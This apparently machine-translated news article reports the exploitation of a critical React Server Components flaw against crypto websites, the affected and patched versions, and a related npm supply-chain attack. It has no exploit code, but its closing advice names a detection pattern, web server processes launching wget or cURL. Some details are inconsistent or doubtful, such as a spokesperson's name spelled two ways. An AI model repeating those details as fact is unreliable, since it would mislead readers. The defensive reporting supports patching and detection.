Hackers attack cryptocurrency websites, React bug leads to attacks that drain wallets

A critical RCE bug in React Server Components has been weaponized to deepen the wave of server hijacking, cryptocurrency wallet exfiltration, Monero miner installation, and $3 billion theft in 2025, despite calls for an emergency patch.

A critical security vulnerability in React Server Components has triggered an urgent warning across the crypto industry, as threat actors are exploiting the flaw to compromise wallets and deploy malware, according to the Security Alliance.

The Security Alliance announces that cryptocurrency leakers are actively weaponizing CVE-2025-55182 and urges all websites to immediately check their front-end code for suspicious assets. This vulnerability affects all websites that use React, not just the Web3 protocol, and attackers are targeting permission signatures across the platform.

You may also like: Curve Finance founder proposes 17 million CRV grant to fund 2026 development roadmap

Security researchers say users face risks when signing transactions because malicious code intercepts wallet communications and redirects funds to addresses controlled by attackers.

The official React team published CVE-2025-55182 on December 3rd and rated CVSS 10.0 following a November 29th report by Lachlan Davidson on the Meta Bug Bounty. According to the disclosure, this unauthenticated remote code execution vulnerability exploits the way React decodes payloads sent to server function endpoints, allowing an attacker to craft malicious HTTP requests that execute arbitrary code on the server.

react to new versions

This flaw affects the react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages in react versions 19.0, 19.1.0, 19.1.1, and 19.2.0. According to the advisory, major frameworks such as Next.js, React Router, Waku, and Expo require immediate updates.

According to the release notes, the patch will arrive in versions 19.0.1, 19.1.2, and 19.2.1, and Next.js users will need to upgrade across multiple release lines from 14.2.35 to 16.0.10.

According to the report, researchers discovered two new vulnerabilities in React Server Components while attempting to exploit the patch. These are new issues that are separate from the important CVEs. Researchers say the React2Shell patch remains effective against remote code execution exploits.

Although Vercel introduced web application firewall rules to automatically protect projects on its platform, the company emphasized that WAF protection alone is still not enough. Vercel said in a Dec. 3 security bulletin that users should immediately upgrade to a patched version, adding that the vulnerability affects applications that process untrusted input in a way that allows remote code execution.

The Google Threat Intelligence Group documented a wide range of attacks that began on December 3, tracking criminal groups ranging from opportunistic hackers to government-backed operations. According to the report, the Chinese hacker group mainly targeted cloud servers on Amazon Web Services and Alibaba Cloud and installed various types of malware on the compromised systems.

According to the Google Threat Intelligence Group, these attackers used techniques to maintain long-term access to victims’ systems. Some groups installed software that created remote access tunnels, while others introduced programs that continually downloaded additional malicious tools disguised as legitimate files. According to researchers, the malware hides in system folders and automatically restarts to avoid detection.

Security researchers said financially motivated criminals took part in a wave of attacks starting on December 5, installing cryptocurrency mining software that used victims’ computing power to generate Monero. These miners run constantly in the background, driving up power costs while benefiting the attackers. According to the researchers, underground hacking forums quickly filled with discussions sharing attack tools and exploitation experiences.

The React vulnerability comes on the heels of a September 8 attack in which hackers compromised Josh Goldberg’s npm account and published malicious updates to 18 widely used packages, including chalk, debug, and strip-ansi. Together, these utilities account for more than 2.6 billion weekly downloads, and researchers have discovered cryptoclipper malware that intercepts browser functionality and swaps legitimate wallet addresses with attacker-controlled addresses.

Ledger CTO Charles Guilmet described the incident as a “massive supply chain attack” and advised users without hardware wallets to avoid on-chain transactions. According to Guillemet, the attacker gained access through a phishing campaign posing as npm support, claiming that unless two-factor authentication credentials were updated by September 10th, the account would be locked.

Hackers are stealing cryptocurrencies and moving them faster, with one laundering process reportedly taking just 2 minutes and 57 seconds, according to industry data.

According to data from Global Ledger, hackers stole more than $3 billion in 119 incidents in the first half of 2025, and 70% of breaches involving funds were moved before they were made public. According to the report, only 4.2% of stolen assets are recovered because laundering now takes seconds instead of hours.

According to the security advisory, organizations using React or Next.js are encouraged to immediately patch versions 19.0.1, 19.1.2, or 19.2.1, deploy WAF rules, audit all dependencies, and monitor network traffic for wget or cURL commands initiated by web server processes to look for unauthorized hidden directories or malicious shell configuration injections.

read more: Curve Finance founder proposes 17 million CRV grant to fund 2026 development roadmap